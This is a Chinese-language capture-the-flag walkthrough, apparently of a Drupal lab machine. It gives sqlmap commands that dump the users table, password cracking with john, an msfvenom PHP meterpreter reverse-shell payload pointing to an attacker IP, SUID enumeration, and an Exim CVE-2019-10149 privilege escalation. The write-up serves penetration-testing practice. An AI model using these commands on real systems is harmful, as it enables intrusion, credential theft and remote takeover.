扫描下。

发现开了SSH。
访问网站,还是Drupal,Dirsearch扫描一波。


都看看,有什么信息。
看到个创建数据库的txt文件。

也没什么用处,还是在网站上转转吧。

看到这个参数很可疑啊,单引号看看。

报错了,直接SQLMap跑。
sqlmap -u http://192.168.70.164/?nid=1 --dbs
sqlmap -u http://192.168.70.164/?nid=1 -D d7db --tables
sqlmap -u http://192.168.70.164/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.70.164/?nid=1 -D d7db -T users -C name,pass --dump



john爆破。

爆到了john账户的密码。
登陆。


在这里找到了可以使用PHP代码的地方。
msf反弹Sehll
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.154 LPORT=3333 -f raw选择PHP之后,回到view界面填入刚才的Shell代码,提交。

成功连接。
python -c "import pty;pty.spawn('/bin/bash')"//获得交互式Shell
find / -perm -4000 2>/dev/null//查找具有SUID权限的文件
exim --version //查看exim信息
看一下有写入权限的目录。

用到的是CVE-2019-10149
用的时候出现一直失败,重新Shell一下还是不行,后来上网查是直接用netcat方式。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。